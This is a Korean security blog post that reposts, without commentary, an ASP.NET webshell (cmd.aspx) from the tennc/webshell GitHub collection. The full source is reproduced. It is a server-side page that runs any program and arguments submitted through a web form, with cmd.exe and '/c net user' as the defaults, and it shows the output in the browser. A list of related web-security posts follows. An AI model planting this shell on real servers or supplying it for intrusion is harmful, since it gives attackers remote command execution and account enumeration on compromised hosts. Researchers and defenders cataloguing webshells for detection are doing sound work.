https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
GitHub - tennc/webshell: This is a webshell open source project
This is a webshell open source project. Contribute to tennc/webshell development by creating an account on GitHub.
github.com
| <%@ Page Language="VB" Debug="true" %> | |
| <%@ import Namespace="system.IO" %> | |
| <%@ import Namespace="System.Diagnostics" %> | |
| <script runat="server"> | |
| Sub RunCmd(Src As Object, E As EventArgs) | |
| Dim myProcess As New Process() | |
| Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) | |
| myProcessStartInfo.UseShellExecute = false | |
| myProcessStartInfo.RedirectStandardOutput = true | |
| myProcess.StartInfo = myProcessStartInfo | |
| myProcessStartInfo.Arguments=xcmd.text | |
| myProcess.Start() | |
| Dim myStreamReader As StreamReader = myProcess.StandardOutput | |
| Dim myString As String = myStreamReader.Readtoend() | |
| myProcess.Close() | |
| mystring=replace(mystring,"<","<") | |
| mystring=replace(mystring,">",">") | |
| result.text= vbcrlf & "<pre>" & mystring & "</pre>" | |
| End Sub | |
| </script> | |
| <html> | |
| <body> | |
| <form runat="server"> | |
| <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label> | |
| <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox> | |
| <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label> | |
| <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox> | |
| <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button> | |
| <p><asp:Label id="result" runat="server"></asp:Label> | |
| </form> | |
| </body> | |
| </html> |
'웹' 카테고리의 다른 글
| graphql insql (0) | 2022.04.23 |
|---|---|
| xinha 에디터 추가 (0) | 2022.04.20 |
| HTTP Request Smuggling (0) | 2022.04.09 |
| 서버버전 정보 노출 대응방안 (0) | 2022.02.25 |
| SSTF Github (0) | 2022.02.23 |
wtdsoul